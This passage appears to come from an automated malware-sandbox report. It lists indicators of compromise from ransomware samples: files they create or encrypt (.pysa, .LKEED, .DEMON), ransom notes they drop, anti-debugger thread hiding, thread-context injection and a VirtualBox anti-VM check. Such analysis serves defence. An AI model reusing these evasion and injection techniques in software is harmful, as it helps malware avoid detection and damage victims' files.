File created C:\Windows\SysWOW64\regsvr32.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\SystemPropertiesProtection.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\Speech_OneCore\Common\SpeechModelDownload.exe CyberPunk2077.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData svchost.exe File created C:\Windows\SysWOW64\autochk.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\fixmapi.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\netiougc.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\recover.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\wextract.exe CyberPunk2077.exe File created C:\Windows\SysWOW64\chkntfs.exe CyberPunk2077.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 1264 Trojan-Ransom.Win32.Blocker.msqy-ff81d22425d201f6f4580749050ca4984bbfeccc7be8a0283691ad7649517c7f.exe 4996 Trojan-Ransom.Win32.Crusis.eib-815c65023598d2116c9c3f397888905cf233f34f70b430baf9ca5ca142e36cad.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 5520 Trojan-Ransom.Win32.Encoder.dkc-2940604e31753c75f80a85b2ead90cd63bdcf2fe05094ceeec99ac35c7d898a3.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 4728 Trojan-Ransom.Win32.Darkside.g-f42bcc81c05e8944649958f8b9296c5523d1eb8ab00842d66530702e476561ef.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe 3088 HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5892 set thread context of 6128 5892 Trojan-Ransom.Win32.Foreign.ofkr-508929881cfc28b3bd540c9faba556004322f050a6b57916a2cd368ca8c02f05.exe 172 -
resource yara_rule behavioral1/memory/1264-258-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-256-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-254-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-252-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-248-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-246-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-244-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-242-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-241-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-238-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-236-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-234-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-232-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-230-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-229-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-226-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-225-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-250-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/memory/1264-223-0x0000000010000000-0x000000001003D000-memory.dmp upx behavioral1/files/0x000700000002432f-4084.dat upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN HEUR-Trojan-Ransom.Win32.Convagent.gen-02a84352764e37be9723c06c4b838a8fe3f329a49fb621a098401df0b1842795.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-400_contrast-white.png CyberPunk2077.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest4-ppd.xrm-ms.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\Readme.README HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files (x86)\Common Files\System\fr-FR\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\SmallTile.scale-200_contrast-black.png CyberPunk2077.exe File opened for modification C:\Program Files\Mozilla Firefox\gmp-clearkey\Readme.README.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\CANYON.INF HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javafxpackager.exe.DEMON HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\EmptyShare.scale-400.png CyberPunk2077.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\nashorn.jar.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\et\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-oob.xrm-ms.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\back-arrow-default.svg.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN026.XML.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\eu-es\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-200_8wekyb3d8bbwe\Win10\MicrosoftSolitaireWideTile.scale-200.jpg HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-phn.xrm-ms HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-140.png.DEMON HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-100.png.DEMON.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libbluray-awt-j2se-1.3.2.jar.pysa.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\affDescription.txt.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\423x173\9.jpg HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\Logo.scale-100_contrast-white.png HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_SubTrial-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\selector.js.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsSmallTile.scale-100.png CyberPunk2077.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\BKANT.TTF HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\readme.txt HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_de.properties.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\bcel.md.pysa.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ko-kr\Readme.README HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O16EnterpriseVL_Bypass30-ppd.xrm-ms HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\ui-strings.js.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\Microsoft Office\root\Office16\Document Parts\1033\16\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder-default.svg.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Restore-My-Files.txt HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-96_altform-unplated_contrast-black.png HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files\Mozilla Firefox\application.ini HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\Office16\OSPP.HTM HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\illustrations.png.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\msth8ES.LEX HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-72_altform-unplated_contrast-black.png CyberPunk2077.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-pl.xrm-ms.LKEED HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\201.png CyberPunk2077.exe File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageMedTile.scale-200_contrast-white.png CyberPunk2077.exe File opened for modification C:\Program Files\Java\jre-1.8\lib\security\policy\unlimited\local_policy.jar.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\Readme.README HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\UnlockResize.gif.LKEED.pysa HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_filter_18.svg.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_1.1911.21713.0_x64__8wekyb3d8bbwe\Assets\Store\AppIcon.targetsize-24_altform-lightunplated.png HEUR-Trojan-Ransom.Win32.Wanna.gen-898c8c5467ed3d47141527148d32ca812f5098764ed53f42f58ff6228b53ad05.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\GenericMailBadge.scale-100.png CyberPunk2077.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.pysa HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp.pysa HEUR-Trojan-Ransom.Win32.Generic-e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead.exe File created C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideLogo.scale-200_contrast-white.png CyberPunk2077.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] CyberPunk2077.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\readme.txt HEUR-Trojan-Ransom.Win32.Cryptor.gen-5cf0a6ac9786638a063eea9ab68508f31e537072bbcea27371f9121d2668a251.exe File created C:\Program Files\WindowsApps\Microsoft.Wallet_2.4.18324.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe CyberPunk2077.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Assets\SmallLogo.scale-100.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-appmanagement-uevagent_31bf3856ad364e35_10.0.19041.1288_none_71734bf99a2a6955\Microsoft.Uev.SyncController.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-p..tionsimulationinput_31bf3856ad364e35_10.0.19041.746_none_492c8c53f3547077\r\PerceptionSimulationInput.exe CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-u..etry-client-wowonly_31bf3856ad364e35_10.0.19041.1_none_4c7da197e5837576\dtdump.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-appx-deployment-server_31bf3856ad364e35_10.0.19041.264_none_3f30ef10158954bf\ApplyTrustOffline.exe CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\eventTracepointDisabled.png CyberPunk2077.exe File created C:\Windows\WinSxS\wow64_microsoft-windows-powershell-exe_31bf3856ad364e35_10.0.19041.546_none_5163f0069562aff6\r\powershell.exe CyberPunk2077.exe File created C:\Windows\WinSxS\x86_wpf-terminalserverwpfwrapperexe_31bf3856ad364e35_10.0.19041.1_none_7e31b18ab29f9913\TsWpfWrp.exe CyberPunk2077.exe File created C:\Windows\ImmersiveControlPanel\images\TileSmall.png CyberPunk2077.exe File created C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.173_none_6486f23c2831aaf3\InputApp\InputApp\Assets\SquareLogo310x310.scale-400.png CyberPunk2077.exe File created 